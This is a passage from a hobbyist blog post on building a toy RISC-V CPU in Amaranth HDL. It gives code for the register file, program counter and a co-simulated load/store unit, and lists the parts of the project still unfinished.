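        # read values
        self.o_rs1_value = SignedSignal(32)
        self.o_rs2_value = SignedSignal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        registers = Array(SignedSignal(32) for _ in range(32))

        # reads are combinational and always reflect the current values
        m.d.comb += self.o_rs1_value.eq(registers[self.i_select_rs1])
        m.d.comb += self.o_rs2_value.eq(registers[self.i_select_rs2])

        # writes become visible at the next positive clock edge;
        # x0 stays zero because it is never written
        with m.If(self.i_we & (self.i_select_rd != 0)):
            m.d.sync += registers[self.i_select_rd].eq(self.i_data)

        return m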
Program Counter
The simplest component: we start executing programs at 0x1000 and then go to the next instruction. The decoder computes an offset based on the instruction, to allow both absolute and relative jumps.
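A minimal sketch (simplified: the reset value matches the 0x1000 start address, and the decoder is assumed to supply +4 as the offset for sequential execution):

class ProgramCounter(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")

        # offset to add, from the decoder: +4 for sequential execution,
        # otherwise a branch / jump target offset
        self.i_offset = SignedSignal(32)
        self.o_instruction_address = Signal(32, reset=0x1000)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # the new address becomes visible at the next positive clock edge
        m.d.sync += self.o_instruction_address.eq(
            self.o_instruction_address + self.i_offset)

        return m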
Load Store Unit (LSU)
I'm co-simulating this part, so there is no hardware implementation here. Simulating even small amounts of memory also turned out to be way too slow; I hope to find more time in the future to complete this part of the project, and to then run it with real memory on an FPGA instead of just in simulation.
But let's at least discuss the most interesting aspect of memory: memory is usually very slow compared to the CPU, so the CPU has to be stalled, i.e. made to wait, while the memory executes the read or write. In my design I have defined an o_done signal, which tells the control unit not to advance the program counter until the result is available. I'm not sure if this is the best approach, but it works for now.
class LoadStoreUnit(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")

        # from decoder, not in spec, internal control signals
        self.i_lsu_mode = Signal(2)

        # from decoder, memory operation
        self.i_funct3 = Signal(3)

        # address
        self.i_address_base = Signal(32)
        self.i_address_offset = SignedSignal(12)

        # reading / writing
        self.i_data = Signal(32)
        self.o_data = Signal(32)

        # signals completion of the memory operation
        self.o_done = Signal(1)

    def elaborate(self, _: Platform) -> Module:
        m = Module()
        # empty by design: this is co-simulated
        return m
Tying it all together and testing it
The control unit connects all modules, as described in the simplified diagram above, and uses the control logic from the decoder to correctly advance the program counter.
Instead of showing the boring glue code, here's how I'm testing the CPU via simulation: the assembly program is designed to set registers to certain values that can be checked afterwards. It does not follow any ABI constraints.
My development time ran out before I completed the project, so there is no Game of Life on my toy CPU for now. So what's missing?
memory mapped I/O, so that instead of keeping the LEDs in memory, signals / pins of the CPU are used,
adding support for a few missing read / write operations to the memory controller (read byte, write byte),
integrating the emulator and simulator, re-using the existing debugger user interface,
and then likely spending some time on debugging,
maybe porting the simulator to Verilator or another framework to make it fast enough.
But I thought having a blog post now is much better than completing the experiment first. I hope to find time in the future to work on this again, finally run Game of Life on my CPU, and actually run it on an FPGA. That would be fun.
But the best part really is: I've learned so much, as you've just read. Try it yourself. Thank you for reading 🙂
Full source code
You can find my source code at https://github.com/fnoeding/fpga-experiments . It’s not as clean as the snippets above, but I hope it provides additional context if you’d like to dive deeper.